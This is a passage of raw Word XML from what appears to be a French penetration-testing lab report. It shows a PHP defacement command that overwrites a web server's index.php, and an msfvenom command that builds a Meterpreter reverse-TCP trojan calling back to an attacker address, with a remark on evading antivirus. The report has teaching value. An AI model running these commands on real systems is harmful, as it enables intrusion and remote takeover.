    <w:p w14:paraId="77B37538" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6465ADD4" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C3B9F7" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="591C0191" w14:textId="2355FFF3" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Test de commandes Meterpreter :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44455035" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E6316E" w14:textId="77777777" w:rsidR="007F79AD" w:rsidRDefault="000911E8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000911E8">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FAA6973" wp14:editId="27C4E8C1">
            <wp:extent cx="5760720" cy="3369310"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="202447986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79860" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3369310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34301D1B" w14:textId="77777777" w:rsidR="007F79AD" w:rsidRDefault="007F79AD">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FD2E3E" w14:textId="77777777" w:rsidR="007F79AD" w:rsidRDefault="007F79AD">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Petite injection </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans l’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E9CC53" w14:textId="77777777" w:rsidR="007F79AD" w:rsidRDefault="007F79AD" w:rsidP="007F79AD">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F79AD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F79AD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F79AD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F79AD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F79AD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F79AD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'Vive les pingouins !'; ?&gt;" &gt; /var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F79AD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31C12F7A" w14:textId="77777777" w:rsidR="007F79AD" w:rsidRDefault="007F79AD" w:rsidP="007F79AD">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="007F79AD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EBC16CF" wp14:editId="6D5D08F1">
            <wp:extent cx="5760720" cy="2985135"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="422243509" name="Image 1" descr="Une image contenant text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43509" name="Image 1" descr="Une image contenant texte, logiciel, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2985135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B471B28" w14:textId="7CC8DCE4" w:rsidR="007F79AD" w:rsidRDefault="007F79AD" w:rsidP="007F79AD">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="351D0ED0" w14:textId="77777777" w:rsidR="007F79AD" w:rsidRDefault="007F79AD" w:rsidP="007F79AD"/>
    <w:p w14:paraId="188E77AB" w14:textId="77777777" w:rsidR="007F79AD" w:rsidRDefault="007F79AD" w:rsidP="007F79AD"/>
    <w:p w14:paraId="66495E90" w14:textId="77777777" w:rsidR="007F79AD" w:rsidRDefault="007F79AD" w:rsidP="007F79AD"/>
    <w:p w14:paraId="3310FDFE" w14:textId="77777777" w:rsidR="007F79AD" w:rsidRDefault="007F79AD" w:rsidP="007F79AD"/>
    <w:p w14:paraId="6D108362" w14:textId="77777777" w:rsidR="007F79AD" w:rsidRDefault="007F79AD" w:rsidP="007F79AD"/>
    <w:p w14:paraId="1DF97492" w14:textId="167F4B9A" w:rsidR="007F79AD" w:rsidRDefault="007F79AD" w:rsidP="007F79AD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Voici ce que cela donne sur le site web</w:t>
      </w:r>
      <w:r w:rsidR="00997ECF">
        <w:t xml:space="preserve"> que nous avons infecté </w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A906193" w14:textId="77777777" w:rsidR="00997ECF" w:rsidRDefault="00997ECF" w:rsidP="007F79AD"/>
    <w:p w14:paraId="0AF70DA6" w14:textId="77777777" w:rsidR="007F79AD" w:rsidRDefault="007F79AD" w:rsidP="007F79AD">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="007F79AD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FE9DBD6" wp14:editId="1367D8B0">
            <wp:extent cx="5760720" cy="3451860"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="586021915" name="Image 1" descr="Une image contenant capture d’écran,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21915" name="Image 1" descr="Une image contenant capture d’écran, logiciel, Logiciel multimédia, Icône d’ordinateur&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3451860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5423CB" w14:textId="13879E5D" w:rsidR="007F79AD" w:rsidRDefault="007F79AD" w:rsidP="007F79AD">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E37296" w14:textId="309D21B6" w:rsidR="007F79AD" w:rsidRPr="007F79AD" w:rsidRDefault="00D40939" w:rsidP="00D40939">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6754F044" w14:textId="77777777" w:rsidR="00377B56" w:rsidRDefault="00377B56" w:rsidP="00377B56">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc197957017"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cheval De Troie / Trojan (msfvenom) :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="558002C4" w14:textId="279F3186" w:rsidR="00986BBC" w:rsidRDefault="00986BBC" w:rsidP="00986BBC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'outil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> est inclus dans le </w:t>
      </w:r>
      <w:r>
        <w:t>Framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> metasploit. Il est la fusion des anciens outils </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Accentuation"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Accentuation"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>msfencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nous servira à la création sur mesure de payload avec possibilité d'encodage (voir même multi-encodage) pour échapper aux antivirus par exemple.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF6FAD6" w14:textId="637E70F5" w:rsidR="00986BBC" w:rsidRDefault="00986BBC" w:rsidP="00986BBC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'outil se lance dans un terminal. Sa documentation est accessible avec l'option </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
        </w:rPr>
        <w:t>-h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2B779E" w14:textId="77777777" w:rsidR="00986BBC" w:rsidRDefault="00986BBC" w:rsidP="00986BBC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00986BBC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05A3BCAF" wp14:editId="29FA04CD">
            <wp:extent cx="6187555" cy="2805953"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="199091491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14918" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6210910" cy="2816544"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06284C0B" w14:textId="6380ECE9" w:rsidR="00986BBC" w:rsidRDefault="00986BBC" w:rsidP="00986BBC">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="123A531C" w14:textId="77777777" w:rsidR="00377B56" w:rsidRPr="00377B56" w:rsidRDefault="00377B56" w:rsidP="00377B56">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD57CE6" w14:textId="77D6B85A" w:rsidR="004B5BDB" w:rsidRDefault="004B5BDB" w:rsidP="004B5BDB">
      <w:r w:rsidRPr="004B5BDB">
        <w:t xml:space="preserve">msfvenom propose un grand nombre de </w:t>
      </w:r>
      <w:r w:rsidRPr="004B5BDB">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="004B5BDB">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="004B5BDB">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
        </w:rPr>
        <w:t>msfvenom --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B5BDB">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B5BDB">
        <w:rPr>
          <w:rStyle w:val="SansinterligneCar"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r w:rsidRPr="004B5BDB">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AB7941">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A3EEB" w14:textId="77777777" w:rsidR="004B5BDB" w:rsidRDefault="004B5BDB" w:rsidP="004B5BDB"/>
    <w:p w14:paraId="496A264C" w14:textId="77777777" w:rsidR="004B5BDB" w:rsidRDefault="004B5BDB" w:rsidP="00AB7941">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004B5BDB">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01D0B225" wp14:editId="3AC5D5C3">
            <wp:extent cx="6435589" cy="2940423"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="161745560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55600" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6489220" cy="2964927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C11BF" w14:textId="1E6D2D87" w:rsidR="004B5BDB" w:rsidRDefault="004B5BDB" w:rsidP="004B5BDB">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="257976AC" w14:textId="77777777" w:rsidR="004B5BDB" w:rsidRDefault="004B5BDB" w:rsidP="004B5BDB"/>
    <w:p w14:paraId="5388A86A" w14:textId="77777777" w:rsidR="004B5BDB" w:rsidRDefault="004B5BDB" w:rsidP="004B5BDB"/>
    <w:p w14:paraId="0B1C9821" w14:textId="0169C585" w:rsidR="004B5BDB" w:rsidRDefault="00AB7941" w:rsidP="004B5BDB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Générons le payload avec msfvenom, on va utiliser la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C9710" w14:textId="5B69D39B" w:rsidR="00AB7941" w:rsidRDefault="00AB7941" w:rsidP="00AB7941">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7941">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB7941">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB7941">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB7941">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB7941">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB7941">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB7941">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f elf LHOST=192.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8.1.82</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB7941">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=4444 &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB7941">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>runmeplz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28A6F416" w14:textId="77777777" w:rsidR="00AB7941" w:rsidRDefault="00AB7941" w:rsidP="00AB7941">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BF2461" w14:textId="028326E6" w:rsidR="00AB7941" w:rsidRDefault="00AB7941" w:rsidP="00AB7941">
      <w:r w:rsidRPr="00AB7941">
        <w:t xml:space="preserve">Vérifions maintenant ce qui a été </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">généré avec la commande suivante : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236B24A2" w14:textId="2FE1EC0E" w:rsidR="00AB7941" w:rsidRDefault="00AB7941" w:rsidP="00AB7941">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>Ls -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runmeplz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B5CF77C" w14:textId="77777777" w:rsidR="00AB7941" w:rsidRDefault="00AB7941" w:rsidP="00AB7941">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722F7A52" w14:textId="77777777" w:rsidR="00AB7941" w:rsidRDefault="00AB7941" w:rsidP="00AB7941">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AB7941">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="694A496D" wp14:editId="6043D5E4">
            <wp:extent cx="6333492" cy="1183341"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1826675192"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75192" name="Image 1" descr="Une image contenant texte, Police, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6382056" cy="1192415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="033BE9B3" w14:textId="6D89225B" w:rsidR="00AB7941" w:rsidRDefault="00AB7941" w:rsidP="00AB7941">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0B5654" w14:textId="77777777" w:rsidR="00AB7941" w:rsidRPr="00AB7941" w:rsidRDefault="00AB7941" w:rsidP="00AB7941"/>
    <w:p w14:paraId="29A87778" w14:textId="190261A2" w:rsidR="00AB7941" w:rsidRDefault="00AB7941" w:rsidP="004B5BDB">
      <w:r>
        <w:t xml:space="preserve">On peut voir que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>l’on a pas</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> encore les droits pour </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>éxec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
